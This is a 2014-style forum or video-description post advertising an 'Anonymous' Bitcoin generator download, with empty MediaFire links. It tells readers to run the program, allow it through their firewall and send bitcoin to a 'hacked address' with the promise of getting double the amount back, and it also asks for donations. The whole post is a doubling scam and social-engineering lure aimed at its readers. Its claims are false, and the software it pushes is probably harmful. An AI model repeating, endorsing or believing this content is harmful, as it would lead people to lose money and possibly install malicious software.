ONLY Working Bitcoin Generator - ANONYMOUS!! - MediaFire link 2014!

Hi Bit-Coiners! To be frank, I can't believe i came across this video, the original one was leaked by some Anonymous guy from Serbia So i thought I'd share it around since I've been screwed before using these programs! ENJOYY!!!! ------------------------------------------------------------ DOWNLOAD LINKS: Data File host: Mediafire: VIRUS SCAN: ----------------------------------------­-------------------------------------- UPDATE as of 10/03/2014 ----------------------------------------­-------------------------------------- We are Anonymous We are Legion. We do not forgive. We do not forget. Expect us The team have worked very hard at coding these scripts and putting them together in a very nice and simple package for everyone to use. This video has been leaked on the anonymous forum, it's updated and fairly new and It' works after you allow the firewall access to the program. I've copied the details across here, you must send-to-receive(from a hacked address) twice the amount of bitcoin ! SUPPORT AND DONATE TO ANONYMOUS via OR they will disable this generator. HOW TO USE: Open/Run the program Wait for 'Status connected' Enter a valid address and a bitcoin amount (0.25 - 2.0) Click on generate COPY the hacked-generated address Open your bitcoin wallet/bitcoin QT Send to the "hacked address" the bitcoin amount you set within the program (INCLUDING TRANSACTION FEE) Wait a few hours and you will recieve DOUBLE (2x) the amount of bitcoins sent. Head to cyberwarfare and donate to ANONYMOUS. Very simple - Please do not beg here bitcoins and SUPPORT ANONYMOUS.